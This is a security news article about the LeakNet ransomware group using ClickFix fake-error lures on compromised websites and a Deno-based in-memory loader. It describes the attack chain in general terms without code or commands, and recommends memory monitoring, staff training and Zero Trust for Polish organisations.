LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader

Cybercriminals are always looking for new ways to bypass security. Now a group called LeakNet — known for ransomware operations — has found a method that is both simple and dangerously effective. Instead of traditional attacks on infrastructure, it uses ClickFix — a social engineering technique that involves convincing a user to run malicious code themselves. All of this happens on websites that hackers have previously compromised. This is a shift in cybercriminal tactics that shows that traditional methods — such as stealing login credentials — may be becoming increasingly unprofitable.

What is particularly concerning is that LeakNet uses Deno — a modern JavaScript runtime typically associated with legitimate programming — for this purpose. A loader written in Deno operates entirely in RAM, which means that traditional threat detection tools have difficulty detecting it. This is no longer an attack that can be blocked at the network firewall or simple antivirus level. This is a threat requiring a completely new approach to security.

The story of LeakNet is the story of a group that is not afraid to experiment. Their new arsenal is changing the threat landscape for Polish companies, particularly those that still rely on outdated security models.

ClickFix: When the User Opens the Door for the Attacker

ClickFix is a tactic that at first glance seems almost archaic — convincing a user to run a system command under the guise of solving a technical problem. However, its effectiveness is alarming. The user sees an error message that looks authentic and is asked to perform a simple action. Innocently, they will copy the command and paste it into the terminal. Seconds later, their computer is infected.

What makes ClickFix particularly dangerous as executed by LeakNet is the fact that the entire threat comes from websites that the user visits normally. There is no phishing email here that could be filtered at the mail server level. There is also no suspicious link that would look odd. Instead, when a user visits a compromised website — sometimes popular, sometimes less well-known — they encounter a message warning them of a "security problem" or "infected system". Everything looks professional and trustworthy.

Security in this scenario depends on one factor: user awareness. But knowledge of threats in Polish companies remains at a low level. Surveys show that a significant portion of employees would not be able to distinguish an authentic system message from a fake one. For the LeakNet group, this means a huge opportunity for success.

It is also worth noting that ClickFix can be delivered in many ways. It can be a popup that appears on a website. It can also be a banner that looks like an official message from the website owner. Hackers can even manipulate the mobile version of a website so that the message appears on the user's smartphone — where it is even more difficult to assess the authenticity of the warning.

Deno Runtime: A New Weapon in the Cybercriminal Arsenal

Deno is a modern alternative to Node.js, created by JavaScript creator Ryan Dahl. For most developers, it is simply a tool for writing faster, safer code. For cybercriminals, it is something else — it is an opportunity.

LeakNet uses Deno to create an in-memory loader — a program that runs exclusively in a computer's RAM. This means it creates no files on disk. Traditional antivirus solutions search for malicious files — they scan the disk, analyze executables, check signatures. But if the threat never reaches the disk, these tools are practically useless.

A loader written in Deno can execute arbitrary code directly in memory. In practice, this means that attackers can:

• Download and run ransomware directly from the command server
• Modify system behavior in real-time, without the need to install permanent components
• Hide traces of their activity, because nothing is saved to disk
• Bypass traditional threat detection tools that search for files

The fact that LeakNet chose Deno shows the growing sophistication of the group. This is no longer an attack that can be blocked by simple antivirus. This is an attack that requires deep skills in operating system security, memory process monitoring, and behavioral anomaly detection.

For Polish companies that still rely on traditional security solutions, this means that their systems could be infected without any visible sign of infection. Ransomware could be running in the background, encrypting data, and the system administrator would have no idea what is happening until it is too late.

Compromised Websites: Attack Infrastructure in Your Neighborhood

LeakNet does not build new infrastructure to conduct attacks. Instead, it takes over existing websites and uses them as a platform to distribute ClickFix. This approach has many advantages for attackers — websites are already known and trusted by users, which increases the chances that someone will click on the fake message.

The question is: how does LeakNet take over these websites? There are several possibilities. First, they can exploit known vulnerabilities in content management systems such as WordPress or Joomla. Second, they can purchase access to compromised servers on the dark market. Third, they can conduct attacks on website administrators to obtain their passwords.

For website owners in Poland, this should be a warning. If your website is taken over, you could unknowingly be distributing malware to thousands of users. Legal and reputational liability could be enormous. The Internal Security Agency has already issued warnings about this type of attack — Polish internet infrastructure is increasingly being attacked.

What is worse, website owners may not know that their website has been compromised. Attackers can be very discreet — they can add ClickFix only for specific users, for example those visiting the site from specific countries or at specific times. This makes detecting the problem more difficult.

From Stolen Passwords to Social Engineering: The Evolution of LeakNet's Tactics

The history of ransomware groups shows a clear trend: the more security develops, the more advanced attacks become. LeakNet is no exception. The shift from traditional methods — such as stealing login credentials or zero-day exploits — to ClickFix shows that the group is adapting to the new security landscape.

Password theft makes sense when employees use weak passwords and when there is no multi-factor authentication. But more and more companies are implementing MFA, and passwords are becoming increasingly complex. ClickFix, on the other hand, does not require breaking any security systems — it only requires deceiving the user. This is much cheaper and more reliable.

LeakNet appears to be a group that understands that the future of cybercrime lies in social engineering rather than traditional technical attacks. This is concerning because social engineering can only be automated to a certain extent. It requires an understanding of human psychology, the ability to create credible scenarios, and the ability to adapt to new security trends.

For Polish organizations, this means that security training becomes as important as traditional technical tools. An employee who knows how to recognize a fake error message is more valuable to a company than the most expensive firewall.

Zero Trust Security: The Answer to Threats Like LeakNet

Traditional security models were based on the assumption that everything inside the corporate network is secure. If an employee was in the office, their computer was trusted. If a VPN connection was established, the traffic was secure. These assumptions no longer make sense in a world where employees work from home, use personal devices, and visit untrusted websites.

The Zero Trust approach changes this logic. Instead of trusting a device or network, the system verifies every user action in real-time. If an employee tries to access sensitive data, the system checks not only their identity, but also the state of their device, location, time of day, and other factors. If something looks suspicious, access is denied or additional authentication is required.

In the context of a LeakNet attack, Zero Trust could change the game. Even if a user ran malicious code from ClickFix, the system would detect it. The Deno loader would try to connect to the command server, but the Zero Trust system would block it because the connection would look suspicious. Ransomware would try to access files, but the system would check whether the user should actually have access to those files at that moment.

ZTNA (Zero Trust Network Access) is a more advanced form of Zero Trust that eliminates traditional network perimeters. Instead of VPN, which gives users access to the entire network, ZTNA gives access only to specific applications that the user needs. This greatly limits the possibility of lateral movement — the ability that attackers could use to spread across the network after gaining access to one computer.

Polish Infrastructure and Readiness for LeakNet Attacks

Poland is increasingly being attacked by ransomware groups. A 2023 ABW report showed that the number of security incidents in Polish organizations increased by more than 40 percent compared to the previous year. LeakNet is not yet known as a group that specializes in attacks on Poland, but it is only a matter of time.

Poland has several characteristics that make it an attractive target for cybercriminals. First, many Polish companies still use older systems and software that are not regularly updated. Second, awareness of security threats in Poland is lower than in the United States or Germany. Third, Polish critical infrastructure — such as power plants, hospitals, or banks — is a target for state-sponsored attackers.

For Polish companies, this means they must take threats like LeakNet seriously. This is no longer a matter of the future — it is a matter of the present. Companies that do not take action now will be at risk.

What specifically should Polish organizations do? First, they should implement tools to monitor processes in memory — traditional antivirus is not enough. Second, they should train employees on recognizing ClickFix and other social engineering tactics. Third, they should consider implementing ZTNA to limit the possibility of lateral movement. Fourth, they should have an incident response plan — because if an attack occurs, quick response can be the difference between a small loss and a catastrophe.

Technical Depth: How the Deno Loader Works in Practice

To truly understand the threat posed by LeakNet, it is worth taking a closer look at how their Deno loader works. The Deno runtime has several features that make it attractive to attackers. First, it is designed to run JavaScript code without the need for compilation. Second, it has access to operating system APIs, which allows it to perform arbitrary system operations. Third, it is less well-known than Node.js, which means fewer system administrators know how to monitor it.

A loader written in Deno can be loaded by ClickFix as follows. The user runs a command that downloads a Deno script from the attacker's server. The script is run directly in memory — it never reaches the disk. The loader then downloads the actual ransomware from the command server and runs it in memory as well. The ransomware begins encrypting the user's files.

The entire process takes only a few seconds. The system administrator may not notice anything suspicious until it is too late. Traditional threat detection tools may not detect anything because there are no files to scan. Even network traffic monitoring tools may have difficulty if the traffic is encrypted.

Deno also has the ability to hide from oversight. It can change its process name to look like other legitimate software. It can also manipulate system logs to remove evidence of its activity. All of this makes it a very dangerous tool in the hands of cybercriminals.

The Future: What Awaits Us Next?

LeakNet is just one of many groups experimenting with new tactics. Other ransomware groups are watching what LeakNet does, and if it succeeds, they will imitate it. ClickFix and Deno loader could become standard tools in the cybercriminal arsenal.

For the security industry, this means we must change the way we think about threats. Traditional tools — antivirus, firewall, IDS — are already insufficient. We must focus on behavioral anomaly detection, memory process monitoring, and Zero Trust implementation. We must also invest in employee education, because humans remain the weakest link in the security chain.

For Polish companies, this means they must act quickly. Attacks like LeakNet can spread rapidly, and Polish organizations may not be prepared. Companies that take action now — implementing ZTNA, training employees, and investing in modern threat detection tools — will be much better prepared for what awaits us in the future. For the rest, disappointment and significant financial losses await.